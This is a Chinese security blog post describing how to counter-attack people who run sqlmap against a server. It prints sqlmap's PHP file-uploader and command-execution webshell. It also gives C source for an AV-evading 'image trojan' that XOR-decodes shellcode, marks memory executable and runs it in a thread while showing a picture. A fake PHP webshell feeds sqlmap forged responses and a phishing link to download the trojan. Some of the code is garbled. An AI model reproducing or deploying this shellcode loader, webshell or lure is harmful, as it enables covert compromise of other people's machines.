之前有看到goby反制和松鼠A师傅蚁剑反制的文章,再想到之前写过sqlmap的shell免杀,觉得思路其实差不多,就写一篇sqlmap的反制吧。
sqlmap流量分析(其实可以通过分析解密后sqlmap内置的backdoor后门文件(文章链接))
具体sqlmap的攻击流程差不多是这样:
测试链接是否能够访问判断操作系统版本传递一个数组,尝试爆绝对路径指定上传路径使用lines terminated by 写入一个php文件,该php文件可以进行文件上传尝试找到上传的文件的访问路径;直到找到正确的路径通过上传的临时文件,尝试上传另外一个php文件, 该文件可以进行命令执行尝试进行命令执行 echo command execution test直接输入对应的命令退出 -–os-shell后删除命令马
然后我们反制思路其实大概分为两个
- 一个是通过打开的页面嵌入js来直接执行命令
- 另一个是通过打开钓鱼页面(比如flash钓鱼那种)
这两个相比而言其实各有优点,但我决定结合一下
通过打开的页面来下载图片马,然后进行rce
制作图片马里面的程序用C写的,用异或做了免杀(和其他师傅学习的)
这个是引用的头文件
//{{NO_DEPENDENCIES}}
//
#define IDR_IMAGE1 101
#define IDI_ICON1 102
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 103
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
这个才是C脚本
#include<graphics.h>
#include<conio.h>
#include<iostream>
#include "resource.h"
using namespace std;
void image() {
IMAGE img;
loadimage(&img, L"IMAGE", MAKEINTRESOURCE(IDR_IMAGE1));
int w, h;
w = img.getwidth();
h = img.getheight();
initgraph(w, h);
putimage(0, 0, &img);
getchar();
closegraph();
}
int main()
{
unsigned char shellc0de[] = "x1cx65x9dx1cxd5xbdx89xabxabxabx1cxd9x51xbbxabxabxabx1cxefx4cxc8xaexedx37x61xeex24x1cx65x0cx73x1cx79xacxabxabxabxb6xa0xb0x80x2dx09xc7x89x2ex24x4cxc8xefxbcx76x31xbcx75x1ax80x9fx3fx52x29x65x76x2cx80x25xbfx2fx29x65x76x6cx80x25x9fx67x29xe1x93x06x82xe3xdcxfex29xdfxe4xe0xf4xcfx91x35x4dxcex65x8dx01xa3xacx36xa0x0cxc9x1ex89xffxa5xbcx33xcexafx0exf4xe6xecxe7xeax6exacx4cxc8xaexa5xb2xa1x9ax43x04xc9x7exbdxbcx29xf6x60xc7x88x8exa4x36xb1x0dx72x04x37x67xacxbcx55x66x6cx4dx1exe3xdcxfex29xdfxe4xe0x89x6fx24x3ax20xefxe5x74x28xdbx1cx7bx62xa2x00x44x8dx97x3cx42xb9xb6x60xc7x88x8axa4x36xb1x88x65xc7xc4xe6xa9xbcx21xf2x6dx4dx18xefx66x33xe9xa6x25x9cx89xf6xacx6fx3fxb7x7ex0dx90xefxb4x76x3bxa6xa7xa0xe8xefxbfxc8x81xb6x65x15x92xe6x66x25x88xb9xdbxb3x37xf3xa5x8dx60xeex24x4cxc8xaexedx37x29x63xa9x4dxc9xaexedx76xdbxdfxafx23x4fx51x38x8cx81xf3x0ex46x89x14x4bxa2xdcx73xdbx99x80x2dx29x1fx5dxe8x58x46x48x55x0dx42x64x55x63x5fxbaxc1x87x37x38xafxadx96x37x7bx8ex56x0dx8dx0ax29xb0xcbxedx37x61xeex24";
unsigned char key[] = "x09xab";
unsigned char aa[] = "x32xff";
DWORD dw_size = sizeof shellc0de;
int i;
for (i = 0; i < dw_size; i ) {
shellc0de[i] ^= key[1];
shellc0de[i] = aa[1] - shellc0de[i];
}
LPVOID men = CoTaskMemAlloc(sizeof shellc0de);
DWORD lpflOldProtect = 0;
UINT name = RegisterClipboardFormatW((LPCWSTR)shellc0de);
VirtualProtect(men, sizeof3 shellc0de, 0x40, &lpflOldProtect);
GetClipboardFormatNameW(name, (LPWSTR)men, sizeof shellc0de);
HANDLE handle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)men, 0, 0, 0);
WaitForSingleObject(handle, -1);
image();
return 0;
}
图片自己选一张然后生成马就行
马弄得差不多了,接下来看看sqlmap的流量分析
众所周知,sqlmap会使用lines terminated by 写入一个php文件,可以进行文件上传。
<?php
// 判断是否有一个upload的值传过来
if (isset($_REQUEST["upload"]))
{
// 将uploadDir赋值给绝对路径
$dir = $_REQUEST["uploadDir"];
// 判断php版本是否小于4.1.0
if (phpversion() < '4.1.0')
{
$file = $HTTP_POST_FILES["file"]["name"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die;
}
else
{
$file = $_FILES["file"]["name"];
// 完成上传
@move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die;
}
// 设置权限
@chmod($dir . "/" . $file, 0755);
echo "File uploaded";
}
else
{
echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=D:\XXX\XXXX> <input type=submit name=upload value=upload></form>";
}
然后找绝对路径,上传下面这个真正的命令马。
<?php
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set("max_execution_time",0);
$z=@ini_get("disable_functions");
if(!empty($z)) {
$z=preg_replace("/[, ] /",',',$z);
$z=explode(',',$z);
$z=array_map("trim",$z);
} else {
$z=array();
}
$c=$c." 2>&1
";// 将命令与 2>&1进行拼接
function f($n) {
global $z;
return is_callable($n)and!in_array($n,$z);//is_callable函数检查f($n)在当前环境中是否可调用
}
if(f("system")) {
ob_start();
system($c);
$w=ob_get_clean();//返回输出缓冲区的内容,清空(擦除)缓冲区并关闭输出缓冲
} elseif(f("proc_open")) {
$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
$w=NULL;
while(!feof($t[1])) {//feof函数检查是否已到达文件末尾(EOF)
$w.=fread($t[1],512);
}
@proc_close($y);
} elseif(f("shell_exec")) {
$w=shell_exec($c);
} elseif(f("passthru")) {
ob_start();
passthru($c);
$w=ob_get_clean();
} elseif(f("popen")) {//popen()函数通过创建一个管道,调用 fork 产生一个子进程,执行一个 shell 以 运行命令 来开启一个进程。这个进程必须由 pclose () 函数关闭
$x=popen($c,r);
$w=NULL;
if(is_resource($x)) {
while(!feof($x)) {
$w.=fread($x,512);//fread() 函数读取文件(可安全用于二进制文件)。512:读取的最大字节数。
}
}
@pclose($x);// pclose()函数关闭标准 I/O 流,等待命令执行结束,然后返回 shell 的终止状态。
} elseif(f("exec")) {
$w=array();
exec($c,$w);
$w=join(chr(10),$w).chr(10);
} else {
$w=0;
}
echo"<pre>$w</pre>";
?>
而最后的返回包,webshell获取了网站目录、数据库类型等信息。
这个时候,我们可以写一个伪造的sqlmap的”webshell“
echo "SORRY"; preg_match('/system|proc_open|shell|php|sys|shell_exec|user|passthru|create|upload|file|popen|static|get|sleep|exec|eval|str|set/i',$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'system', 'proc_open', 'shell', 'shell_exec', 'popen', 'exec', 'passthru', ' ', ";"], "", $c);//将命令执行函数替换掉
$txt='D:/IIS5.0/WWW'." ".'C:D:E:F:'." ".'Windows NT LAPTOP-46FFII5G 6.2 build 9200 (Windows 8 Business Edition) i586'." ";
echo "$txt";//伪造连通
然后搭配上挂马图片的下载链接
$iscmd="%(.*)127;%si";
if (preg_match($iscmd,$A)!=0) {
preg_match('/system|proc_open|shell|php|sys|shell_exec|user|passthru|create|upload|file|popen|static|get|sleep|exec|eval|str|set/i',$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'system', 'proc_open', 'shell', 'shell_exec', 'popen', 'exec', 'passthru', ' ', ";"], "", $c);//将命令执行函数替换掉
$payload='http://shell.com/index.html';
echo 'WARN://'."
".'数据上传成功,但与flash进行交互,请访问该网址进行shell链接。SQLMAP:'."$payload";
一代目
php写的不好,可能有点不符合sqlmap返回包的形式,以后我慢慢改吧
<?php
$A=urldecode(file_get_contents("php://input"));
$iscmd="%(.*)127;%si";
if (preg_match($iscmd,$A)!=0) {
preg_match('/system|proc_open|shell|php|sys|shell_exec|user|passthru|create|upload|file|popen|static|get|sleep|exec|eval|str|set/i',$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'system', 'proc_open', 'shell', 'shell_exec', 'popen', 'exec', 'passthru', ' ', ";"], "", $c);//将命令执行函数替换掉
$payload='http://exp.com/index.html';
echo 'WARN://'."
".'数据上传成功,但与flash进行交互,请访问该网址进行shell链接。SQLMAP:'."$payload";//随便写,诱惑别人点进去。反正我是不信sqlmap会用flash
} else {
echo "SORRY";
preg_match('/system|proc_open|shell|php|sys|shell_exec|user|passthru|create|upload|file|popen|static|get|sleep|exec|eval|str|set/i',$A,$B);
$c="$B[0]";
$key= str_replace(['"', '.', 'system', 'proc_open', 'shell', 'shell_exec', 'popen', 'exec', 'passthru', ' ', ";"], "", $c);//将命令执行函数替换掉
$txt='D:/IIS5.0/WWW'." ".'C:D:E:F:'." ".'Windows NT LAPTOP-46FFII5G 6.2 build 9200 (Windows 8 Business Edition) i586'." ";
echo "$txt";//伪造连通性
}
反思
其实这个想法我感觉可能不太好,在连通性处写的可能有问题,我的wireshark有点问题,一直抓不了本地的流量包,只能看我终端返回的内容进行伪造了=_=
如果可以的话,师傅们可以抓本地流量包,然后自己改写伪造连通性的脚本。
本文由AndyNoel原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/261915
安全客 - 有思想的安全新媒体